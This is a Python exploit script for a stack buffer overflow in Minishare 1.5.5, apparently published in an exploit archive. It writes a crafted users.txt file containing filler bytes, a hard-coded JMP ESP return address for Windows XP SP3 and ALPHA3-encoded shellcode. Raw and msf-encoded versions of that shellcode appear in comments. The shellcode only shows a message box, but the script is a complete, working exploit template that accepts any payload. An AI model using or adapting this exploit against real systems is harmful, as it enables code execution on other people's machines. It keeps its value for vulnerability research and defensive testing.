
# Title : Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Published : 2010-11-02
# Author : Chris Gabriel


# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Date: 11/02/2010
# Author: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: 

# MessageBoxA TITLE=HAX TEXT=HAX, Windows XP SP3 EN shellcode (raw form, 21 bytes).
# It calls MessageBoxA through a hard-coded address (mov eax, 0x7e4507ea; call eax), so it is
# tied to the user32.dll build it was tested on; the "HAX\0" immediate also carries a NUL byte.
# \xbb\x48\x41\x58\x00\x53\x89\xe6\x31\xc0\x50\x56\x56\x50
# \xb8\xea\x07\x45\x7e\xff\xd0

# msfencoded MessageBoxA shellcode (the escapes below had lost their backslashes in the listing)
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
# \x33\xc9\xb1\x06\xda\xd2\xd9\x74\x24\xf4\x5b\xb8\x1f\xf9
# \xf2\x17\x83\xeb\xfc\x31\x43\x10\x03\x43\x0f\x1b\x07\xac
# \x67\x9a\xb0\xd3\x24\x95\xa7\xe5\x0a\xf5\x71\x50\xda\x4e
# \x97\x5b\x9f\xd0\x97\xb4
# This stage still contains a 0x0a byte, presumably the reason for the ALPHA3 pass below.

# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
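shellcode = (
    b"TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
    b"QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
    b"M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
    b"Q9S123I1Y3N9R8M4E0G"
)

# Stack layout recovered in the debugger: 78 bytes of filler reach the saved
# return address, the next 4 bytes are the address itself, and ESP points at
# the byte immediately after it (78 to EIP, 82 to ESP).
EIP_OFFSET = 78
# Room available after the return address for the ESP-relative payload.
MAX_PAYLOAD = 304
# 0x7E48494B  JMP ESP in user32.dll, Windows XP SP3 EN, written little-endian.
# The original listing had lost its backslashes ("x4bx49x48x7e"), which turned
# this into a 12-character string and shifted every offset after it; the
# escapes are restored here.
JMP_ESP = b"\x4b\x49\x48\x7e"
# Bytes that would presumably end the line or the string when users.txt is
# parsed as text (the payload is ALPHA3 uppercase-alphanumeric for the same
# reason).  TODO confirm against the Minishare users.txt parser.
BAD_CHARS = b"\x00\r\n"


def build_payload(code=shellcode):
    """Return the users.txt contents: filler, return address, then ``code``.

    code: raw shellcode bytes; they land exactly where ESP points after the
          JMP ESP, so they must be position-independent and fit MAX_PAYLOAD.
    Raises ValueError when ``code`` is larger than MAX_PAYLOAD or the final
    payload contains a byte from BAD_CHARS.
    """
    if len(code) > MAX_PAYLOAD:
        raise ValueError(
            "shellcode is %d bytes, only %d fit after the return address"
            % (len(code), MAX_PAYLOAD)
        )
    payload = b"A" * EIP_OFFSET + JMP_ESP + code
    # Iterating bytes yields ints on Python 3 and 1-char strs on Python 2;
    # the membership test works for both.
    if any(c in payload for c in BAD_CHARS):
        raise ValueError("payload contains a NUL, CR or LF byte")
    return payload


def write_payload(path="users.txt"):
    """Write the malicious users.txt to ``path`` and return the bytes written.

    Propagates IOError/OSError from open()/write() and ValueError from
    build_payload().
    """
    payload = build_payload()
    # Binary mode: no newline translation or text encoding between the
    # payload and the file on disk.
    with open(path, "wb") as handle:
        handle.write(payload)
    return len(payload)


def main():
    """Create users.txt in the current directory and report the outcome."""
    try:
        write_payload()
    except (IOError, OSError, ValueError) as exc:
        # Report the actual reason instead of swallowing every exception.
        print("[-] Error occurred: %s" % exc)
        return
    print("[+] Vulnerable file created!  Place the 'users.txt' file in the Minishare directory and run the program...\n")


if __name__ == "__main__":
    main()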